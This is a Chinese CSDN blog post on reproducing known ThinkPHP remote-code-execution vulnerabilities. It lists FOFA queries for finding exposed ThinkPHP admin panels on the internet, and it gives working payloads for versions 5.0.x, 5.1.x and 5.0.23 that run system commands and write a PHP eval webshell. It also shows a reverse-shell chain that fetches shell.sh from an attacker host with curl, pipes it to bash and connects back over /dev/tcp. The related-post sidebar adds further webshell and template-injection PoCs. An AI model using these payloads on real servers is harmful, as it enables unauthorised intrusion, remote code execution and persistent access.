ThinkPHP历史漏洞复现

最新推荐文章于 2024-05-10 20:58:45 发布
最新推荐文章于 2024-05-10 20:58:45 发布
阅读量1.1k 收藏 4
点赞数 2
分类专栏: 漏洞复现 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53747497/article/details/129338186
版权

ThinkPHP历史漏洞复现

ThinkPHP简介

Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。
很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。

版本漏洞
ThinkPHP3.2.3缓存函数设计缺陷可导致Getshell
ThinkPHP3.2.3最新版update注入漏洞
ThinkPHP3.2.Xfind_select_delete注入
ThinkPHP3.Xorder_by注入漏洞
ThinkPHP5.0.Xsql注入漏洞
ThinkPHP5.0.10缓存函数设计缺陷可导致Getshell
ThinkPHP5SQL注入漏洞&&敏感信息泄露
ThinkPHP5.Xorder_by注入漏洞
ThinkPHP5.X远程代码执行

发现漏洞

1.fofa搜索语句

header="thinkphp" && country="US" 
header="thinkphp" && country="US" && title="后台管理" 
header="thinkphp" && country="CN" && title="后台管理" && after="2021-01-01"

2.默认页面,可以看到版本信息,用/?s=aaa来测试
请添加图片描述
请添加图片描述

在kali里找thinkphp的poc

searchsploit thinkphp

//找到poc文件的绝对路径
searchsploit -p 46150.txt

//找到文件
cd /usr/share/exploitdb/exploits/php/webapps/
cat 46150.txt

请添加图片描述

请添加图片描述

请添加图片描述

5.0.* 版本漏洞复现

常用poc

1.测试

/index.php? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

/index.php? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

请添加图片描述

2.getshell

/index.php? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[ccc]);?>

请添加图片描述

3.访问http://ip:8080/shell.php,用hackbar工具去测试。

请添加图片描述

5.1.* 版本漏洞复现

常用poc

1.测试

/index.php? s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami


/index.php? s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

2.getshell

/index.php? s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST[ccc]);?>" >shell.php

thinkphp 5.0.23漏洞复现

1.使用s=captcha 触发,然后使用hackbar去输入对应的poc

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

请添加图片描述

请添加图片描述

2.写入shell,然后访问1.php

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php eval(\$_POST['cmd']);?>" > 1.php

请添加图片描述

3.可以反弹shell,先写个Shell.sh文件,bash -i >& /dev/tcp/192.168.42.132/9090 0>&1

//攻击机上开启http服务
python3 -m http.server

//网页上进行请求下载攻击机上的shell.sh文件
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl http://192.168.42.132:8000/shell.sh | bash

//开启监听9090端口,执行上面的poc就可以弹回shell

请添加图片描述
请添加图片描述

00zzz
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc1
08-03
主要我这不太会调试就 notepad++ 分析吧fetch 模板漏洞分析流程框架加载上忽略调链* 获取输出内容* 调内置的模板引擎fetch法,* 默认为空 由
ThinkCMF框架任意内容包含漏洞
qq_17754023的博客
02-28 2170
ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本 漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特定的
2024年ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,2024年最新网络安全面试数据结构算法
2401_84301389的博客
05-10 1214
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1641
【thinkcmf-文件包含】public函数
FOFA操作】fofa检索使用thinkphp框架的网站
SUSUYUA的博客
01-13 3170
fofa检索使用thinkphp框架的网站
Thinkphp漏洞复现
weixin_51151498的博客
12-17 1307
Thinkphp漏洞复现
thinkphp漏洞检测工具
06-06
ThinkPHP漏洞检测工具详解》 ThinkPHP是中国最流行的PHP框架之一,因其强大的功能和易用性深受开发者喜爱。然而,任何软件系统都可能存在安全漏洞ThinkPHP也不例外。为了保障Web应用的安全,开发者和安全专家们...
thinkphp 一键漏洞检测
12-09
然而,如同所有软件一样,ThinkPHP也有可能存在安全漏洞,这些漏洞可能被恶意用户利用,对网站造成严重威胁。"thinkphp 一键漏洞检测"工具正是为了解决这个问题而设计的。 该工具适用于ThinkPHP框架的多个版本,从V...
thinkPHP漏洞检测
最新发布
07-18
thinkPHP漏洞检测
漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现
wwl012345的博客
11-29 2854
0x00 简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 0x01 漏洞介绍 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 0...
记录 ThinkCMF 框架 X2.2.3 版本漏洞发现与解决
Peak Xin's Blog
03-24 715
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻。因为它的这两个方法是公用的,我们需要把它改为私用的,这样才可以不被前端的用户去任意的利用。,根据网警提供的检测报告在postman工具上操作复现漏洞情况。那找解决方法吧,升级框架肯定是不现实的,好歹是找了解决方案。网站是基于ThinkCMF框架搭建的,查看版本是。点击发送,看看结果,意不意外惊不惊喜!修复后,再次访问,解决了。
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1259
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
ThinkCMF 2.2.0漏洞
2301_79773660的博客
09-22 299
?>’)/shell.php?>’)
thinkcmf任意包含漏洞
lionwerson的博客
11-18 2032
thinkcmf影响范围: thinkcmf <= 2.2.2 安装好thinkcmf: poc: ?a=display&templateFile=README.md 通过模板缓存实现的漏洞,可以读取和写入日志文件: 写入webshell: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php..
Think.PHP框架漏洞复现
m0_71300782的博客
09-13 958
2.服务器启动先cd到thinkphp文件夹下面的5-rce里面,然后docker-compose up -d 安装环境3.进入浏览器ip地址加8080看见。
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2313
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
Thinkphp5.0.0~5.0.23 RCE漏洞复现分析
cosmoslin的博客
11-19 6158
漏洞概要 漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。 环境搭建: Phpstudy: OS: Windows PHP: 7.3.4 ThinkPHP: 5.0.22 POC http://xxxxxx.xxx/public/?s=captcha Body _method=__construct&filter[]=system&method=get&get.
Thinkphp5.1.4漏洞复现
05-11
ThinkPHP 5.1.4 存在一个参数绑定漏洞,攻击者可以通过构造特定的请求,执行任意代码。 以下是漏洞复现的步骤: 1. 下载 ThinkPHP 5.1.4,创建一个名为 `demo` 的项目。 2. 在 `demo/application/index/controller` 目录下创建一个名为 `Index.php` 的控制器,添加以下代码: ```php <?php namespace app\index\controller; use think\Controller; class Index extends Controller { public function index($name = '') { $this->assign('name', $name); return $this->fetch(); } } ``` 3. 在 `demo/application/index/view` 目录下创建一个名为 `index.html` 的模板文件,添加以下代码: ```html <html> <head> <title>ThinkPHP 5.1.4 Demo</title> </head> <body> <h1>Hello, {$name}!</h1> </body> </html> ``` 4. 启动本地服务器,访问 `http://localhost:8000/index/index`,可以看到页面上显示了 "Hello, !"。 5. 构造以下 payload,并发送 GET 请求: ``` http://localhost:8000/index/index/name/${@phpinfo()}; ``` 注意,这里的 `${}` 是模板引擎的语法,可以在模板中执行 PHP 代码。`@` 符号可以防止 PHP 报错。 6. 页面上将显示 PHPinfo 的信息,说明漏洞已被成功利用。 为了修复漏洞,需要将 ThinkPHP 升级到 5.1.5 及以上版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值